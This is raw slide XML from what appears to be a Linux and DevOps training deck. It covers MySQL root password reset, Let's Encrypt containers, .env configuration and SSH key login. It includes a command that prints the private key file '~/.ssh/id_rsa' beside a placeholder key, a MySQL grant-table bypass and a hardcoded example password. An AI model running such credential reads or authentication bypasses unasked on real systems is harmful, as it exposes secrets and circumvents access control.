            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="8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How to reset mysql root password ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4501" name="Google Shape;4501;p730"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1255450"/>
            <a:ext cx="7632900" cy="37137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2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo service mysql stop</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo mysqld_safe --skip-grant-tables &amp;</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql -u root</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FLUSH PRIVILEGES;</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER USER 'root'@'localhost' IDENTIFIED BY 'anil789';</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FLUSH PRIVILEGES;</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo pkill mysqld</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl start mysql</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4505"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4506" name="Google Shape;4506;p731"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358100" y="1061625"/>
            <a:ext cx="8520600" cy="8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Create a up and running ubuntu container with Automatic SSL ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4507" name="Google Shape;4507;p731"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410150" y="2118875"/>
            <a:ext cx="8416500" cy="1485600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Automatic Let's Encrypt HTTPS certificate management for exposed Application to Internet</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4511"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4512" name="Google Shape;4512;p732"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="8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Single Centeral .env file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4513" name="Google Shape;4513;p732"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1255450"/>
            <a:ext cx="7632900" cy="3017400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>All configurations should be made single central </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4517"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4518" name="Google Shape;4518;p733"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="85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How you can login to a remote server ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4519" name="Google Shape;4519;p733"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1255450"/>
            <a:ext cx="7632900" cy="3017400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Username and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Using SSH Keys</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>PublicKey -&gt; Server</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>PrivateKey -&gt; Local</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:high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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151650" y="774600"/>
            <a:ext cx="8840700" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to directly jump to user’s home directory?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Google Shape;521;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351025" y="1537600"/>
            <a:ext cx="4882500" cy="29469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sz="6100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd ~</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="6100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="6100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4523"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4524" name="Google Shape;4524;p734"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="8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How to login to a server without password?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4525" name="Google Shape;4525;p734"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500850" y="1550100"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4081575"/>
                <a:gridCol w="4060725"/>
              </a:tblGrid>
              <a:tr h="796300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="3100">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Client</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="3100">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="3100">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Server</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="3100">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="1938200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Private</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Key</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="accent5"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cat ~/.ssh/id_rsa</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>-----BEGIN OPENSSH PRIVATE KEY-----</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>-----END OPENSSH PRIVATE KEY-----</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
